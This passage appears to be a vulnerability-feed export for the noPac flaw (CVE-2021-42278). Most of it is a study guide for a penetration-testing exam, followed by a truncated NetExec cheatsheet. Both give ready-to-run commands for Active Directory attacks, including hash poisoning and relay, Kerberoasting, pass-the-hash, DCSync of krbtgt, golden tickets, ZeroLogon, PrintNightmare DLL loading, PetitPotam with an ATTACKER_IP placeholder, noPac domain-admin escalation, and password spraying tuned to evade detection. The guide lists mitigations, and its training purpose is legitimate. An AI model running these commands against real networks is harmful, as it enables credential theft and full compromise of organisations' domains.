"creation_timestamp": "2022-07-06T21:36:38.000000Z"}, {"uuid": "99d942ad-57e7-4656-9fdc-4a5e5e9b97fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4957", "content": "#tools\n#Offensive_security\n1. JNDI Exploit Kit\nhttps://github.com/pimps/JNDI-Exploit-Kit\n2. CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter\nhttps://github.com/cube0x0/noPac\n// If a Domain Controller is vulnerable it will return a TGT without a PAC, all eyes on small size tickets", "creation_timestamp": "2021-12-12T17:52:26.000000Z"}, {"uuid": "da0b7522-1a2b-423e-b6f1-17be80873121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4979", "content": "#Red_Team_Tactics\nExploiting CVE-2021-42278/CVE-2021-42287 to impersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin\n]-> Python implementation for CVE-2021-42278\n(AD Privilege Escalation)\nhttps://github.com/ly4k/Pachine", "creation_timestamp": "2021-12-15T12:29:46.000000Z"}, {"uuid": "094f5b4b-c420-46db-bd75-558b8ce4fb10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/win_def/61", "content": "Exploiting CVE-2021-42287/CVE-2021-42278 (Linux)\n\nhttps://github.com/WazeHell/sam-the-admin\n\n#ad #pac #s4u2self #windows #redteam", "creation_timestamp": "2021-12-12T20:40:44.000000Z"}, {"uuid": "2eec098a-f2b3-45d4-a399-acc5dd1acae6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://gist.github.com/sidsecurity/39dfb2f2fbe3bb3a32ae31fdb22febea", "content": "Comprehensive Guide to Active Directory Attacks for PNPT Exam\nThis guide covers all major Active Directory attacks relevant to the Practical Network Penetration Tester (PNPT) certification exam. The PNPT exam assesses your ability to perform external and internal network penetration tests, with heavy emphasis on AD exploitation, lateral movement, and ultimately compromising the Domain Controller.\n\nTable of Contents\nPre-Compromise Enumeration\n\nLLMNR/NBT-NS Poisoning (Responder)\n\nSMB Relay Attacks\n\nKerberoasting\n\nAS-REP Roasting\n\nPassword Spraying\n\nPass-the-Hash (PtH)\n\nDCSync Attack\n\nACL Abuse & BloodHound\n\nUnconstrained Delegation Attacks\n\nADCS Attacks (Certified Pre-Owned)\n\nPetitPotam & NTLM Relay to ADCS\n\nKerberos Golden/Silver Tickets\n\nZeroLogon (CVE-2020-1472)\n\nPrintNightmare (CVE-2021-1675)\n\nnoPac (CVE-2021-42278/CVE-2021-42287)\n\nAttack 1: Pre-Compromise AD Enumeration\nDescription\nBefore executing any attack, you must enumerate the Active Directory environment. This includes discovering domain controllers, users, groups, and shares without any credentials (null session) or with low-privileged accounts.\n\nTools Used\nenum4linux-ng\n\nldapsearch\n\nrpcclient\n\nnmap\n\nCrackMapExec (now netexec)\n\nCommands\nSMB Null Session Enumeration:\n\nbash\n# Enumerate via SMB\nrpcclient -U \"\" -N 192.168.1.10\n> srvinfo\n> enumdomusers\n> enumdomgroups\n\n# Using enum4linux-ng\nenum4linux-ng -A 192.168.1.10\n\n# Using CrackMapExec\nnetexec smb 192.168.1.10 -u '' -p '' --shares\nLDAP Anonymous Enumeration:\n\nbash\n# Basic LDAP query\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\"\n\n# Dump all users\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\" \"(objectClass=user)\" sAMAccountName userPrincipalName\n\n# Dump all computers\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\" \"(objectClass=computer)\" dNSHostName\nDNS Enumeration:\n\nbash\n# Query DC via DNS\nnslookup\n> set type=SRV\n> _ldap._tcp.dc._msdcs.corp.local\n\n# Using adidnsdump\nadidnsdump -u corp.local\\\\jsmith -p Password123 --dns-tcp 192.168.1.10\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 1: enum4linux-ng output showing domain users and groups]\n\nCaption: enum4linux-ng successful enumeration of domain users from null session\nMitigation\nDisable anonymous LDAP binds\n\nRestrict null session access via HKLM\\System\\CurrentControlSet\\Control\\LSA\\RestrictAnonymous\n\nEnable SMB signing\n\nAttack 2: LLMNR/NBT-NS Poisoning (Responder)\nDescription\nWhen a host cannot resolve a name via DNS, it falls back to Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS). Responder listens for these requests and responds, capturing NTLMv2 hashes from the requesting machine.\n\nTools Used\nResponder (Kali Linux)\n\nInveigh (Windows)\n\nCommands\nStart Responder in Analyze Mode (safe enumeration):\n\nbash\nsudo responder -I eth0 -A\nStart Responder in Poisoning Mode:\n\nbash\nsudo responder -I eth0 -wFvP\nConfigure Responder for SMB Relay (disable SMB/HTTP):\nEdit /usr/share/responder/Responder.conf:\n\nini\n[Responder Core]\n; Servers to start\nSMB = Off\nHTTP = Off\nSQL = On\nFTP = On\nbash\nsudo responder -I eth0 -wFvP\nWindows Alternative (Inveigh):\n\npowershell\n# Load and run Inveigh\nImport-Module .\\Inveigh.ps1\nInvoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 2: Responder capturing NTLMv2 hash from a compromised host]\n\nCaption: Responder captures NTLMv2 hash for user 'jsmith' from host 192.168.1.100\nCracking Captured Hashes\nbash\n# Save hash to file (NTLMv2 format)\nhashcat -m 5600 responder_hash.txt /usr/share/wordlists/rockyou.txt -O\nMitigation\nDisable LLMNR and NBT-NS via Group Policy\n\nEnable Network Access Control\n\nRequire SMB signing\n\nAttack 3: SMB Relay Attack\nDescription\nInstead of cracking captured hashes, you can relay them directly to another machine to authenticate. If the target machine has SMB signing disabled, you can execute commands or dump SAM hashes.\n\nPrerequisites\nTarget must have SMB signing disabled\n\nCaptured hash must be from a user with admin privileges on target\n\nCommands\nCheck for SMB Signing Disabled:\n\nbash\nnmap --script=smb2-security-mode.nse -p445 192.168.1.0/24\nStart NTLM Relay (single target):\n\nbash\nntlmrelayx.py -t 192.168.1.20 -smb2support\nRelay to Multiple Targets:\n\nbash\nntlmrelayx.py -tf targets.txt -smb2support\nExecute Command via Relay:\n\nbash\nntlmrelayx.py -t 192.168.1.20 -smb2support -c \"whoami\"\nGenerate Interactive Shell:\n\nbash\n# Start relay with reverse shell\nntlmrelayx.py -t 192.168.1.20 -smb2support -i\n# Then connect to the interactive shell\nnc 127.0.0.1 11000\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 3: ntlmrelayx.py successfully relaying to target and dumping SAM]\n\nCaption: Successful SMB relay attack dumping local SAM hashes from target 192.168.1.20\nMitigation\nEnable SMB signing on all systems\n\nDisable NTLM authentication where possible\n\nImplement SMB over QUIC for modern environments\n\nAttack 4: Kerberoasting\nDescription\nAny authenticated domain user can request a Kerberos Ticket Granting Service (TGS) ticket for any service account with a Service Principal Name (SPN). The TGS is encrypted with the service account's NTLM hash, allowing offline cracking.\n\nTools Used\nGetUserSPNs.py (Impacket)\n\nRubeus.exe (Windows)\n\nPowerView\n\nCommands\nLinux - Extract all SPNs:\n\nbash\npython3 GetUserSPNs.py -dc-ip 192.168.1.10 corp.local/jsmith:Password123 -request\nSave Hashes for Cracking:\n\nbash\npython3 GetUserSPNs.py -dc-ip 192.168.1.10 corp.local/jsmith:Password123 -request -outputfile kerberoast_hashes.txt\nCrack with Hashcat:\n\nbash\n# Mode 13100 = Kerberos 5 TGS-REP (etype 23)\nhashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -O\nWindows - Using Rubeus:\n\npowershell\n# Request all SPNs\nRubeus.exe kerberoast /outfile:hashes.txt\n\n# Request specific SPN\nRubeus.exe kerberoast /spn:\"MSSQLSvc/sql.corp.local\" /nowrap\nUsing PowerView:\n\npowershell\n# Find all SPNs\nGet-DomainUser -SPN | Select-Object samAccountName, ServicePrincipalName\n\n# Request TGS\nGet-DomainUser -SPN | Request-SPNTicket\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 4: GetUserSPNs.py output with hash for svc_sql account]\n\nCaption: Kerberoasting attack successfully extracts TGS ticket for svc_sql account\nMitigation\nUse long, complex passwords (25+ characters) for service accounts\n\nUse Group Managed Service Accounts (gMSA)\n\nMonitor Event ID 4769 for unusual TGS requests\n\nAttack 5: AS-REP Roasting\nDescription\nAccounts with \"Do not require Kerberos preauthentication\" enabled will respond to authentication requests with an AS-REP message encrypted with the user's password hash. This attack requires NO valid credentials.\n\nCommands\nFind and Roast All Vulnerable Users:\n\nbash\npython3 GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt\nTarget a Specific User:\n\nbash\npython3 GetNPUsers.py corp.local/jsmith -request -format hashcat\nCrack AS-REP Hashes:\n\nbash\n# Mode 18200 = Kerberos 5 AS-REP (etype 23)\nhashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -O\nWindows - Using Rubeus:\n\npowershell\n# Find users with preauth disabled\nRubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 5: GetNPUsers.py successfully retrieving AS-REP hash for user 'svc_backup']\n\nCaption: AS-REP Roasting attack retrieves crackable hash without any authentication\nMitigation\nAudit accounts with preauthentication disabled\n\npowershell\nGet-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth\nEnable preauthentication on all accounts\n\nMonitor Event ID 4768 with error code 0x0\n\nAttack 6: Password Spraying\nDescription\nInstead of brute-forcing one account, password spraying attempts one common password against many accounts. This stays under the lockout threshold.\n\nCommands\nUsing CrackMapExec:\n\nbash\nnetexec smb 192.168.1.10 -u users.txt -p 'Winter2025!' --continue-on-success\nUsing DomainPasswordSpray.ps1:\n\npowershell\nImport-Module .\\DomainPasswordSpray.ps1\nInvoke-DomainPasswordSpray -Password Winter2025!\nUsing Kerbrute:\n\nbash\n# Password spray using Kerberos\nkerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt \"Winter2025!\"\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 6: CrackMapExec successful password spray finding valid credentials]\n\nCaption: Password spray discovers valid credentials for multiple users\nMitigation\nImplement Azure AD Password Protection\n\nUse Fine-Grained Password Policies for privileged accounts\n\nEnable SIEM alerting for distributed failed authentication\n\nAttack 7: Pass-the-Hash (PtH)\nDescription\nWindows NTLM authentication allows authentication using only the hash of a password. Once an NTLM hash is obtained, an attacker can authenticate without ever knowing the plaintext password.\n\nCommands\nUsing CrackMapExec:\n\nbash\nnetexec smb 192.168.1.20 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c\nUsing Impacket:\n\nbash\n# Using psexec\npython3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\n\n# Using wmiexec\npython3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\n\n# Using smbexec\npython3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\nWindows - Using Mimikatz:\n\npowershell\n# Pass the hash\nsekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 7: psexec.py successful pass-the-hash attack gaining shell]\n\nCaption: Pass-the-Hash attack successfully creates remote shell using only NTLM hash\nMitigation\nEnable Protected Users group for privileged accounts\n\nImplement Credential Guard (VBS)\n\nEnforce tiered administration models\n\nDisable NTLM where possible\n\nAttack 8: DCSync Attack\nDescription\nIf an account has \"Replicating Directory Changes\" permissions, it can impersonate a Domain Controller and request replication of AD data, including password hashes for ANY account, including krbtgt and Domain Admins.\n\nCommands\nDump Specific User Hash:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc-user krbtgt\nDump All NTLM Hashes:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc-ntlm\nDump Entire NTDS.dit:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc\nUsing Mimikatz (if on DC or with appropriate rights):\n\npowershell\nlsadump::dcsync /user:krbtgt\nlsadump::dcsync /domain:corp.local /user:administrator\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 8: secretsdump.py successful DCSync extracting krbtgt hash]\n\nCaption: DCSync attack extracts krbtgt hash, enabling Golden Ticket creation\nMitigation\nRestrict replication rights to only Domain Controllers\n\nAudit DCSync rights using BloodHound\n\npowershell\n(Get-Acl \"AD:\\DC=corp,DC=local\").Access | Where-Object { $_.ActiveDirectoryRights -match \"DS-Replication\" }\nMonitor Event ID 4662 for replication access\n\nAttack 9: ACL Abuse & BloodHound\nDescription\nActive Directory objects have Access Control Lists that can be misconfigured. A helpdesk account might have GenericAll on a Domain Admin account, or WriteDACL allowing modification of permissions.\n\nCommands\nCollect Data with BloodHound.py:\n\nbash\nbloodhound-python -u jsmith -p Password123 -d corp.local -dc 192.168.1.10 -c All --zip\nCollect Using SharpHound (Windows):\n\npowershell\n# Ingest all data\nSharpHound.exe -c All\n\n# With specific domain controller\nSharpHound.exe -c All -d corp.local -dc dc.corp.local\nAbuse GenericWrite to Add to Group:\n\npowershell\nAdd-DomainGroupMember -Identity \"Domain Admins\" -Members \"jsmith\"\nAbuse WriteDACL to Grant DCSync Rights:\n\npowershell\nAdd-DomainObjectAcl -TargetIdentity \"DC=corp,DC=local\" -PrincipalIdentity jsmith -Rights DCSync\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 9: BloodHound GUI displaying attack path from user to Domain Admin]\n\nCaption: BloodHound visualization shows shortest path to Domain Admin via ACL misconfigurations\nMitigation\nRun BloodHound defensively on a schedule\n\nAudit all non-default ACL entries\n\nImplement tiered administration\n\nUse tools like ADACLScanner for bulk reporting\n\nAttack 10: Unconstrained Delegation Attacks\nDescription\nWhen a computer has unconstrained delegation enabled, it stores TGTs of any user that authenticates to it. By coercing a Domain Controller to authenticate (via PrinterBug or PetitPotam), the attacker can capture a Domain Admin TGT.\n\nCommands\nFind Systems with Unconstrained Delegation:\n\npowershell\n# Using PowerView\nGet-DomainComputer -Unconstrained | Select-Object samAccountName, dnshostname\n\n# Using AD PowerShell\nGet-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, ServicePrincipalName\nMonitor for TGTs with Rubeus:\n\npowershell\nRubeus.exe monitor /interval:5 /nowrap\nCoerce Authentication with PrinterBug:\n\nbash\npython3 printerbug.py corp.local/username:password@TARGET_DC_IP VICTIM_IP\nExtract TGT and Pass-the-Ticket:\n\npowershell\nRubeus.exe ptt /ticket:\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 10: Rubeus monitoring captures Domain Admin TGT after coercion]\n\nCaption: Unconstrained delegation attack captures DC TGT, granting Domain Admin access\nMitigation\nAvoid unconstrained delegation entirely\n\nUse constrained delegation or RBCD with explicit restrictions\n\nAudit for TrustedForDelegation accounts\n\nAttack 11: ADCS Attacks (Certified Pre-Owned)\nDescription\nActive Directory Certificate Services (AD CS) misconfigurations allow attackers to request certificates for arbitrary users, including Domain Admins, leading to complete domain compromise.\n\nCommands\nEnumerate AD CS with Certipy:\n\nbash\n# Find vulnerable templates\ncertipy-ad find -u jsmith@corp.local -p Password123 -dc-ip 192.168.1.10\n\n# Save output\ncertipy-ad find -u jsmith@corp.local -p Password123 -vulnerable -output adcs_enum\nRequest Certificate via Vulnerable Template:\n\nbash\ncertipy-ad req -u jsmith@corp.local -p Password123 -ca CORP-DC-CA -template User -dc-ip 192.168.1.10\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 11: Certipy find output showing vulnerable certificate templates]\n\nCaption: Certipy enumerates AD CS and identifies ESC1 vulnerability (Client Authentication template)\nMitigation\nDisable vulnerable certificate templates\n\nEnforce manager approval for sensitive templates\n\nImplement certificate auditing\n\nAttack 12: PetitPotam & NTLM Relay to ADCS\nDescription\nPetitPotam coerces a Domain Controller to authenticate to an attacker-controlled server. Combined with NTLM relay to ADCS HTTP endpoints, this yields a certificate for the DC, allowing DCSync and full domain compromise.\n\nPrerequisites\nAD CS server with Web Enrollment enabled\n\nDomain Controller unpatched for CVE-2021-36942\n\nCommands\nSetup NTLM Relay to ADCS:\n\nbash\npython3 ntlmrelayx.py -debug -smb2support --target http://adcs.corp.local/certsrv/certfnsh.asp --adcs --template DomainController\nRun PetitPotam to Coerce DC:\n\nbash\npython3 PetitPotam.py ATTACKER_IP DC_IP\nExtract Certificate (Linux):\n\nbash\n# Save base64 certificate\ncat base64 | base64 -d > certificate.pfx\n\n# Request TGT with PKINIT\npython3 gettgtpkinit.py corp.local/DC01$ -cert-pfx certificate.pfx out.ccache\n\n# Set cache\nexport KRB5CCNAME=out.ccache\n\n# DCSync using TGT\npython3 secretsdump.py -k -no-pass corp.local/DC01\\$@DC01.corp.local\nWindows Alternative using Rubeus:\n\npowershell\n# Request TGT from certificate\nRubeus.exe asktgt /user:DC01$ /certificate: /ptt\n\n# DCSync\nmimikatz \"lsadump::dcsync /user:krbtgt\"\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 12: PetitPotam coercing DC to authenticate to ntlmrelayx]\n\nCaption: PetitPotam forces Domain Controller authentication, captured by ntlmrelayx\nMitigation\nApply Microsoft patch KB5005413\n\nDisable NTLM on AD CS servers\n\nEnable EPA (Extended Protection for Authentication)\n\nAttack 13: Kerberos Golden/Silver Tickets\nDescription\nWith the krbtgt hash, attackers create Golden Tickets - valid TGTs for ANY user (including non-existent ones). Silver Tickets target specific services using service account hashes.\n\nGolden Ticket Commands\nUsing Mimikatz:\n\npowershell\n# Create Golden Ticket for Domain Admin\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:HASH /id:500 /ptt\n\n# Create Golden Ticket with custom expiry\nkerberos::golden /user:EvilAdmin /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:HASH /startoffset:0 /endin:600 /renewmax:10080 /ptt\nUsing Impacket (Linux):\n\nbash\npython3 ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nSilver Ticket Commands\nCreate Silver Ticket for CIFS Service:\n\npowershell\nkerberos::golden /user:EvilUser /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /target:DC01.corp.local /service:cifs /rc4:MACHINE_ACCOUNT_HASH /ptt\nAccess DC with Silver Ticket:\n\nbash\n# Using the ticket to access CIFS\npython3 psexec.py -k corp.local/EvilUser@DC01.corp.local\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 13: Mimikatz Golden Ticket creation and successful psexec to DC]\n\nCaption: Golden Ticket allows complete Domain Controller access without valid credentials\nMitigation\nRotate krbtgt password twice (after DC compromise)\n\nEnable KRBTGT password rotation automation\n\nMonitor for anomalous TGT requests (Event ID 4768)\n\nLimit lifetime of Kerberos tickets\n\nAttack 14: ZeroLogon (CVE-2020-1472)\nDescription\nA critical vulnerability in Netlogon protocol (MS-NRPC) allows attackers to set the machine account password of a Domain Controller to an empty string, then DCSync as that DC.\n\nCommands\nCheck if Vulnerable:\n\nbash\npython3 zerologon_tester.py DC01 192.168.1.10\nExploit to Change DC Password:\n\nbash\npython3 cve-2020-1472-exploit.py DC01 192.168.1.10\nAfter Exploit - DCSync:\n\nbash\npython3 secretsdump.py corp.local/DC01\\$@192.168.1.10 -no-pass\nRestore Original Password (Critical!):\n\nbash\n# Extract original password hash from DCSync results\npython3 restorepassword.py DC01@DC01.corp.local -target-ip 192.168.1.10 -hexpass ORIGINAL_HASH\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 14: ZeroLogon exploit successfully changing DC machine account password]\n\nCaption: ZeroLogon vulnerability exploited, enabling DCSync with empty password\nMitigation\nApply Windows updates from August 2020\n\nEnable enforced Netlogon signing\n\nMonitor for Event ID 5829, 5830, 5831\n\nAttack 15: PrintNightmare (CVE-2021-1675)\nDescription\nThe Print Spooler service on Windows allows remote attackers to execute arbitrary code with SYSTEM privileges. This affects Domain Controllers and member servers.\n\nCommands\nRemote DLL Injection Exploit:\n\nbash\n# Using CVE-2021-1675.py\npython3 CVE-2021-1675.py corp.local/username:password@TARGET_IP /path/to/malicious.dll\nUsing Impacket Version:\n\nbash\npython3 printerbug.py -dll /path/to/malicious.dll corp.local/username:password@TARGET_IP\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 15: PrintNightmare exploitation yielding SYSTEM shell on DC]\n\nCaption: PrintNightmare vulnerability exploited to gain SYSTEM privileges on Domain Controller\nMitigation\nDisable Print Spooler service on Domain Controllers\n\nApply Microsoft security patches\n\nImplement print service hardening\n\nAttack 16: noPac (CVE-2021-42278/CVE-2021-42287)\nDescription\nA chain of two vulnerabilities affecting all Windows Domain Controllers. It allows a standard domain user to impersonate a Domain Controller and request a TGT for Domain Admin.\n\nCommands\nUsing noPac.py:\n\nbash\n# Request Service Ticket to domain controller\npython3 noPac.py corp.local/jsmith:Password123 -dc-ip 192.168.1.10 -dc-host DC01.corp.local -shell --impersonate Administrator\n\n# Or with hash\npython3 noPac.py corp.local/jsmith -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -dc-ip 192.168.1.10\nManual Exploitation with Rubeus:\n\npowershell\n# Add machine account\nAdd-MachineAccount -MachineAccount EvilPC -Password Password123\n\n# Clear SPNs\nSet-ADComputer EvilPC -ServicePrincipalNames @{}\n\n# Change hostname to DC\nSet-ADComputer EvilPC -DnsHostname DC01.corp.local\n\n# Request TGT\nRubeus.exe asktgt /user:EvilPC$ /password:Password123 /domain:corp.local /dc:DC01.corp.local /nowrap\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 16: noPac.py successfully obtaining DA shell from standard user]\n\nCaption: noPac attack chain escalates from low-privilege user to Domain Admin shell\nMitigation\nApply Microsoft patches (October 2021 and later)\n\nMonitor for computer account name changes (Event ID 4742)\n\nImplement PAC validation\n\nTools Reference Summary\nTool\tPurpose\tSource\nResponder\tLLMNR/NBT-NS poisoning\tKali default\nImpacket Suite\tVarious AD attacks\tpipx install impacket\nBloodHound\tAttack path mapping\tKali default\nRubeus\tKerberos abuse\tGitHub\nMimikatz\tCredential extraction\tGitHub\nCrackMapExec (netexec)\tSwiss Army knife for AD\tKali default\nCertipy\tAD CS enumeration/abuse\tsudo apt install certipy-ad\nKerbrute\tUser enumeration\tKali default\n", "creation_timestamp": "2026-05-31T23:19:52.000000Z"}, {"uuid": "76699f7b-91b5-427c-af5e-6aa120f08bb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "Telegram/fO-UeyZKTtHCwNeV96AKSNSdqyEhxnaa_KQJZWWdPcKrF9o", "content": "", "creation_timestamp": "2023-03-14T17:04:16.000000Z"}, {"uuid": "c1f2577e-d80b-424c-9e97-0e904f1d4a8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://gist.github.com/Porkballs/df8b4b4e30522a04debf3644594d1535", "content": "# NXC (NetExec) Cheatsheet\n\nComplete reference for NetExec (NXC) - the network execution tool for pentesting\n\n> **Version Note**: This cheatsheet is based on the latest NetExec version. Always check `nxc  --help` and `nxc  -L` for your specific version.\n\n## Installation\n```bash\npipx install netexec\n# or\napt install netexec\n```\n\n## Basic Syntax\n\n`nxc   -u  -p  / -H  [flags] -M  -o `\n\n---\n\n## Protocols Overview\n\n- `smb` - SMB/CIFS (Port 445)\n- `ldap` - LDAP (Port 389/636)\n- `winrm` - WinRM (Port 5985/5986)\n- `ssh` - SSH (Port 22)\n- `rdp` - RDP (Port 3389)\n- `mssql` - Microsoft SQL Server (Port 1433)\n- `ftp` - FTP (Port 21)\n- `wmi` - WMI (Port 135)\n- `vnc` - VNC (Port 5900)\n- `nfs` - NFS (Port 111)\n\n---\n\n## Target Specification\n```bash\nnxc smb 192.168.1.10                    # Single host\nnxc smb 192.168.1.0/24                  # CIDR range\nnxc smb 192.168.1.1-100                 # Range\nnxc smb targets.txt                     # File with targets (one per line)\n```\n\n---\n\n## Password Spraying\n\n### Pattern: protocol targets.txt users.txt passwords.txt\n\n```bash\n# Domain authentication (default)\nnxc smb targets.txt -u users.txt -p passwords.txt -d DOMAIN\n\n# Local authentication\nnxc smb targets.txt -u users.txt -p passwords.txt --local-auth\n\n# Continue on success (don't stop after first valid)\nnxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success\n\n# Stop on first success per target\nnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce\n\n# Single password spray (safer for avoiding lockouts)\nnxc smb targets.txt -u users.txt -p 'Password123!' -d DOMAIN --continue-on-success\n\n# With jitter to avoid detection\nnxc smb targets.txt -u users.txt -p passwords.txt --jitter 5\n\n# Fail limit options\nnxc smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10     # Global fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3      # Per-user fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --fail-limit 5       # Per-host fail limit\n```\n\n---\n\n## No Authentication\n\n```bash\n# Null session (empty username)\nnxc smb 192.168.1.10 -u '' -p ''\n\n# Guest account\nnxc smb 192.168.1.10 -u 'guest' -p ''\n\n# Anonymous LDAP bind\nnxc ldap 192.168.1.10 -u '' -p ''\n\n# Enumerate without credentials\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt    # SMB signing check\n```\n\n---\n\n## Authentication Methods\n\n### Username and Password\n```bash\nnxc smb 192.168.1.10 -u admin -p 'password'\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN\nnxc smb 192.168.1.10 -u admin -p 'password' --local-auth\n```\n\n### Pass-the-Hash\n```bash\nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H  -d DOMAIN\n```\n\n### Kerberos Authentication\n```bash\n# With password\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k\n\n# Using cached ticket (ccache)\nnxc smb 192.168.1.10 -u admin --use-kcache -k\n\n# With AES key\nnxc smb 192.168.1.10 -u admin --aesKey  -k\n\n# Specify KDC\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k --kdcHost dc01.domain.local\n```\n\n### Certificate Authentication\n```bash\n# PFX certificate\nnxc smb 192.168.1.10 --pfx-cert cert.pfx --pfx-pass password\n\n# PEM certificate\nnxc smb 192.168.1.10 --pem-cert cert.pem --pem-key key.pem\n```\n\n---\n\n## SMB Protocol (Port 445)\n\n### Basic Enumeration (No Auth)\n```bash\nnxc smb 192.168.1.0/24                              # Check SMB version, signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt  # Find relay targets\n```\n\n### Enumeration (With Auth)\n```bash\nnxc smb 192.168.1.10 -u user -p pass --shares              # List shares\nnxc smb 192.168.1.10 -u user -p pass --shares --filter-shares read,write  # Filter by access\nnxc smb 192.168.1.10 -u user -p pass --dir \"C$\"            # List directory contents\nnxc smb 192.168.1.10 -u user -p pass --users               # Enumerate users\nnxc smb 192.168.1.10 -u user -p pass --users --enabled     # Only enabled users\nnxc smb 192.168.1.10 -u user -p pass --users-export out.txt  # Export users to file\nnxc smb 192.168.1.10 -u user -p pass --groups              # Enumerate groups\nnxc smb 192.168.1.10 -u user -p pass --computers           # Enumerate computers\nnxc smb 192.168.1.10 -u user -p pass --local-groups        # Local groups\nnxc smb 192.168.1.10 -u user -p pass --pass-pol            # Password policy\nnxc smb 192.168.1.10 -u user -p pass --smb-sessions        # Active SMB sessions\nnxc smb 192.168.1.10 -u user -p pass --disks               # Enumerate disks\nnxc smb 192.168.1.10 -u user -p pass --interfaces          # Network interfaces\nnxc smb 192.168.1.10 -u user -p pass --loggedon-users      # Logged on users\nnxc smb 192.168.1.10 -u user -p pass --rid-brute           # RID cycling\nnxc smb 192.168.1.10 -u user -p pass --qwinsta             # RDP connections\nnxc smb 192.168.1.10 -u user -p pass --tasklist            # Running processes\n```\n\n### WMI Queries\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\" --wmi-namespace \"root\\cimv2\"\n```\n\n### Spidering Shares\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --spider C$\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --spider-folder Users\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --pattern password\nnxc smb 192.168.1.10 